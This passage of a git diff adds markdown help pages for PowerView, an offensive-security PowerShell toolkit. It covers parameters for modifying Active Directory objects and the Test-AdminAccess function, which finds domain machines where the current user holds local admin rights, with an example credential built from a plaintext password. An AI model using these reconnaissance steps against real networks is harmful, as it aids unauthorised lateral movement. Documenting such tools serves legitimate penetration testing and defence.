or more object properties (in the form of a hashtable) that will XOR the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Clear +Specifies an array of object properties that will be cleared in the directory. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +{{Fill SecurityMasks Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields, if -PassThru is enabled. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 0000000..84eab4e --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md @@ -0,0 +1,101 @@ +# Test-AdminAccess + +## SYNOPSIS +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Test-AdminAccess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. +If this succeeds, the current user context +has local administrator acess to the target. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Test-AdminAccess -ComputerName sqlserver +``` + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Test-AdminAccess +``` + +Returns what machines in the domain the current user has access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + -- cgit v1.2.3